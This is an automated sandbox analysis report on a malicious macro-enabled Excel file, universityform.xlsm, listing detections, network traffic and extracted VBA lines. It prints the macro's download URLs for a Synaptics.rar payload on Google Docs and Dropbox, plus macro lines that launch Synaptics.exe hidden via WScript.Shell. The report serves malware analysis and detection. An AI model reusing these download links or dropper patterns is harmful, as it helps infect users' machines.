Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
universityform.xlsm

Overview

General Information

Sample name:universityform.xlsm
Analysis ID:1582321
MD5:d04491647385cc373152651890cbc6e0
SHA1:b288e5e87ce113af41881431c7004904f6d6ba89
SHA256:2ad9a7b364109c68f911729a3dcde001e6df45e80164f87b0054e8e78161fe99
Tags:xlsmuser-JAMESWT_MHT
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Machine Learning detection for sample
Office process queries suspicious COM object (likely to drop second stage)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • EXCEL.EXE (PID: 7300 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • splwow64.exe (PID: 7420 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • EXCEL.EXE (PID: 7344 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\universityform.xlsm" MD5: 4A871771235598812032C822E6F68F19)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 142.250.185.174, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7300, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49720
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.10, DestinationIsIpv6: false, DestinationPort: 49720, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7300, Protocol: tcp, SourceIp: 142.250.185.174, SourceIsIpv6: false, SourcePort: 443
Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ProcessId: 7300, TargetFilename: C:\Users\user\Desktop\~$universityform.xlsm
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-30T11:00:07.485893+010020283713Unknown Traffic192.168.2.1049720142.250.185.174443TCP
2024-12-30T11:00:08.521146+010020283713Unknown Traffic192.168.2.1049727162.125.66.18443TCP
2024-12-30T11:00:09.629313+010020283713Unknown Traffic192.168.2.1049739162.125.66.18443TCP
2024-12-30T11:01:18.391808+010020283713Unknown Traffic192.168.2.1050016142.250.185.174443TCP
2024-12-30T11:01:19.421194+010020283713Unknown Traffic192.168.2.1050017162.125.66.18443TCP
2024-12-30T11:01:20.511491+010020283713Unknown Traffic192.168.2.1050018162.125.66.18443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: universityform.xlsmAvira: detected
Source: universityform.xlsmVirustotal: Detection: 66%Perma Link
Source: universityform.xlsmReversingLabs: Detection: 68%
Source: universityform.xlsmJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 142.250.185.174:443 -> 192.168.2.10:49720 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.10:49727 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.10:49739 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.185.174:443 -> 192.168.2.10:50016 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.10:50017 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.10:50018 version: TLS 1.2
Source: global trafficDNS query: name: docs.google.com
Source: global trafficDNS query: name: www.dropbox.com
Source: global trafficDNS query: name: www.dropbox.com
Source: global trafficTCP traffic: 192.168.2.10:49720 -> 142.250.185.174:443
Source: global trafficTCP traffic: 192.168.2.10:49727 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:49739 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:50016 -> 142.250.185.174:443
Source: global trafficTCP traffic: 192.168.2.10:50017 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:50018 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:49720 -> 142.250.185.174:443
Source: global trafficTCP traffic: 192.168.2.10:49720 -> 142.250.185.174:443
Source: global trafficTCP traffic: 192.168.2.10:49720 -> 142.250.185.174:443
Source: global trafficTCP traffic: 192.168.2.10:49720 -> 142.250.185.174:443
Source: global trafficTCP traffic: 192.168.2.10:49720 -> 142.250.185.174:443
Source: global trafficTCP traffic: 192.168.2.10:49720 -> 142.250.185.174:443
Source: global trafficTCP traffic: 192.168.2.10:49720 -> 142.250.185.174:443
Source: global trafficTCP traffic: 192.168.2.10:49720 -> 142.250.185.174:443
Source: global trafficTCP traffic: 192.168.2.10:49720 -> 142.250.185.174:443
Source: global trafficTCP traffic: 192.168.2.10:49720 -> 142.250.185.174:443
Source: global trafficTCP traffic: 192.168.2.10:49720 -> 142.250.185.174:443
Source: global trafficTCP traffic: 192.168.2.10:49727 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:49727 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:49727 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:49727 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:49727 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:49727 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:49727 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:49727 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:49727 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:49739 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:49739 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:49739 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:49739 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:49739 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:49739 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:49739 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:49739 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:49739 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:50016 -> 142.250.185.174:443
Source: global trafficTCP traffic: 192.168.2.10:50016 -> 142.250.185.174:443
Source: global trafficTCP traffic: 192.168.2.10:50016 -> 142.250.185.174:443
Source: global trafficTCP traffic: 192.168.2.10:50016 -> 142.250.185.174:443
Source: global trafficTCP traffic: 192.168.2.10:50016 -> 142.250.185.174:443
Source: global trafficTCP traffic: 192.168.2.10:50016 -> 142.250.185.174:443
Source: global trafficTCP traffic: 192.168.2.10:50016 -> 142.250.185.174:443
Source: global trafficTCP traffic: 192.168.2.10:50016 -> 142.250.185.174:443
Source: global trafficTCP traffic: 192.168.2.10:50016 -> 142.250.185.174:443
Source: global trafficTCP traffic: 192.168.2.10:50016 -> 142.250.185.174:443
Source: global trafficTCP traffic: 192.168.2.10:50016 -> 142.250.185.174:443
Source: global trafficTCP traffic: 192.168.2.10:50017 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:50017 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:50017 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:50017 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:50017 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:50017 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:50017 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:50017 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:50017 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:50018 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:50018 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:50018 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:50018 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:50018 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:50018 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:50018 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:50018 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:50018 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:49720 -> 142.250.185.174:443
Source: global trafficTCP traffic: 142.250.185.174:443 -> 192.168.2.10:49720
Source: global trafficTCP traffic: 192.168.2.10:49720 -> 142.250.185.174:443
Source: global trafficTCP traffic: 192.168.2.10:49720 -> 142.250.185.174:443
Source: global trafficTCP traffic: 142.250.185.174:443 -> 192.168.2.10:49720
Source: global trafficTCP traffic: 142.250.185.174:443 -> 192.168.2.10:49720
Source: global trafficTCP traffic: 192.168.2.10:49720 -> 142.250.185.174:443
Source: global trafficTCP traffic: 142.250.185.174:443 -> 192.168.2.10:49720
Source: global trafficTCP traffic: 192.168.2.10:49720 -> 142.250.185.174:443
Source: global trafficTCP traffic: 192.168.2.10:49720 -> 142.250.185.174:443
Source: global trafficTCP traffic: 142.250.185.174:443 -> 192.168.2.10:49720
Source: global trafficTCP traffic: 142.250.185.174:443 -> 192.168.2.10:49720
Source: global trafficTCP traffic: 192.168.2.10:49720 -> 142.250.185.174:443
Source: global trafficTCP traffic: 142.250.185.174:443 -> 192.168.2.10:49720
Source: global trafficTCP traffic: 142.250.185.174:443 -> 192.168.2.10:49720
Source: global trafficTCP traffic: 142.250.185.174:443 -> 192.168.2.10:49720
Source: global trafficTCP traffic: 192.168.2.10:49720 -> 142.250.185.174:443
Source: global trafficTCP traffic: 142.250.185.174:443 -> 192.168.2.10:49720
Source: global trafficTCP traffic: 142.250.185.174:443 -> 192.168.2.10:49720
Source: global trafficTCP traffic: 192.168.2.10:49720 -> 142.250.185.174:443
Source: global trafficTCP traffic: 192.168.2.10:49720 -> 142.250.185.174:443
Source: global trafficTCP traffic: 192.168.2.10:49720 -> 142.250.185.174:443
Source: global trafficTCP traffic: 142.250.185.174:443 -> 192.168.2.10:49720
Source: global trafficTCP traffic: 192.168.2.10:49727 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.10:49727
Source: global trafficTCP traffic: 192.168.2.10:49727 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:49727 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.10:49727
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.10:49727
Source: global trafficTCP traffic: 192.168.2.10:49727 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:49727 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.10:49727
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.10:49727
Source: global trafficTCP traffic: 192.168.2.10:49727 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.10:49727
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.10:49727
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.10:49727
Source: global trafficTCP traffic: 192.168.2.10:49727 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:49727 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.10:49727
Source: global trafficTCP traffic: 192.168.2.10:49727 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.10:49727
Source: global trafficTCP traffic: 192.168.2.10:49739 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.10:49739
Source: global trafficTCP traffic: 192.168.2.10:49739 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:49739 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.10:49739
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.10:49739
Source: global trafficTCP traffic: 192.168.2.10:49739 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:49739 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.10:49739
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.10:49739
Source: global trafficTCP traffic: 192.168.2.10:49739 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.10:49739
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.10:49739
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.10:49739
Source: global trafficTCP traffic: 192.168.2.10:49739 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:49739 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.10:49739
Source: global trafficTCP traffic: 192.168.2.10:49739 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.10:49739
Source: global trafficTCP traffic: 192.168.2.10:50016 -> 142.250.185.174:443
Source: global trafficTCP traffic: 142.250.185.174:443 -> 192.168.2.10:50016
Source: global trafficTCP traffic: 192.168.2.10:50016 -> 142.250.185.174:443
Source: global trafficTCP traffic: 192.168.2.10:50016 -> 142.250.185.174:443
Source: global trafficTCP traffic: 142.250.185.174:443 -> 192.168.2.10:50016
Source: global trafficTCP traffic: 142.250.185.174:443 -> 192.168.2.10:50016
Source: global trafficTCP traffic: 192.168.2.10:50016 -> 142.250.185.174:443
Source: global trafficTCP traffic: 142.250.185.174:443 -> 192.168.2.10:50016
Source: global trafficTCP traffic: 192.168.2.10:50016 -> 142.250.185.174:443
Source: global trafficTCP traffic: 192.168.2.10:50016 -> 142.250.185.174:443
Source: global trafficTCP traffic: 142.250.185.174:443 -> 192.168.2.10:50016
Source: global trafficTCP traffic: 142.250.185.174:443 -> 192.168.2.10:50016
Source: global trafficTCP traffic: 192.168.2.10:50016 -> 142.250.185.174:443
Source: global trafficTCP traffic: 142.250.185.174:443 -> 192.168.2.10:50016
Source: global trafficTCP traffic: 142.250.185.174:443 -> 192.168.2.10:50016
Source: global trafficTCP traffic: 142.250.185.174:443 -> 192.168.2.10:50016
Source: global trafficTCP traffic: 192.168.2.10:50016 -> 142.250.185.174:443
Source: global trafficTCP traffic: 142.250.185.174:443 -> 192.168.2.10:50016
Source: global trafficTCP traffic: 142.250.185.174:443 -> 192.168.2.10:50016
Source: global trafficTCP traffic: 192.168.2.10:50016 -> 142.250.185.174:443
Source: global trafficTCP traffic: 192.168.2.10:50016 -> 142.250.185.174:443
Source: global trafficTCP traffic: 142.250.185.174:443 -> 192.168.2.10:50016
Source: global trafficTCP traffic: 192.168.2.10:50016 -> 142.250.185.174:443
Source: global trafficTCP traffic: 142.250.185.174:443 -> 192.168.2.10:50016
Source: global trafficTCP traffic: 192.168.2.10:50017 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.10:50017
Source: global trafficTCP traffic: 192.168.2.10:50017 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:50017 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.10:50017
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.10:50017
Source: global trafficTCP traffic: 192.168.2.10:50017 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:50017 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.10:50017
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.10:50017
Source: global trafficTCP traffic: 192.168.2.10:50017 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.10:50017
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.10:50017
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.10:50017
Source: global trafficTCP traffic: 192.168.2.10:50017 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:50017 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.10:50017
Source: global trafficTCP traffic: 192.168.2.10:50017 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.10:50017
Source: global trafficTCP traffic: 192.168.2.10:50018 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.10:50018
Source: global trafficTCP traffic: 192.168.2.10:50018 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:50018 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.10:50018
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.10:50018
Source: global trafficTCP traffic: 192.168.2.10:50018 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:50018 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.10:50018
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.10:50018
Source: global trafficTCP traffic: 192.168.2.10:50018 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.10:50018
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.10:50018
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.10:50018
Source: global trafficTCP traffic: 192.168.2.10:50018 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.10:50018 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.10:50018
Source: global trafficTCP traffic: 192.168.2.10:50018 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.10:50018
Source: excel.exeMemory has grown: Private usage: 2MB later: 79MB
Source: Joe Sandbox ViewIP Address: 162.125.66.18 162.125.66.18
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49720 -> 142.250.185.174:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49739 -> 162.125.66.18:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49727 -> 162.125.66.18:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50016 -> 142.250.185.174:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50017 -> 162.125.66.18:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50018 -> 162.125.66.18:443
Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: docs.google.com
Source: global trafficHTTP traffic detected: GET /s/zhp1b06imehwylq/Synaptics.rar?dl=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: www.dropbox.com
Source: global trafficHTTP traffic detected: GET /s/zhp1b06imehwylq/Synaptics.rar?dl=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: www.dropbox.com
Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: docs.google.com
Source: global trafficHTTP traffic detected: GET /s/zhp1b06imehwylq/Synaptics.rar?dl=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: www.dropbox.com
Source: global trafficHTTP traffic detected: GET /s/zhp1b06imehwylq/Synaptics.rar?dl=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: www.dropbox.com
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: docs.google.com
Source: global trafficHTTP traffic detected: GET /s/zhp1b06imehwylq/Synaptics.rar?dl=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: www.dropbox.com
Source: global trafficHTTP traffic detected: GET /s/zhp1b06imehwylq/Synaptics.rar?dl=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: www.dropbox.com
Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: docs.google.com
Source: global trafficHTTP traffic detected: GET /s/zhp1b06imehwylq/Synaptics.rar?dl=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: www.dropbox.com
Source: global trafficHTTP traffic detected: GET /s/zhp1b06imehwylq/Synaptics.rar?dl=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: www.dropbox.com
Source: global trafficDNS traffic detected: DNS query: docs.google.com
Source: global trafficDNS traffic detected: DNS query: www.dropbox.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:00:07 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-BhbZlCXHIgR6LwUQ3SMOpw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:01:18 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-d5JSqhe8I_8TiT8oYCYOmw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD41570.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: vbaProject.binString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
Source: vbaProject.binString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownHTTPS traffic detected: 142.250.185.174:443 -> 192.168.2.10:49720 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.10:49727 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.10:49739 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.185.174:443 -> 192.168.2.10:50016 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.10:50017 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.10:50018 version: TLS 1.2

System Summary

barindex
Source: universityform.xlsmOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
Source: universityform.xlsmOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: universityform.xlsmOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: universityform.xlsmOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: universityform.xlsmOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
Source: universityform.xlsmOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
Source: universityform.xlsmOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
Source: universityform.xlsmOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
Source: universityform.xlsmOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
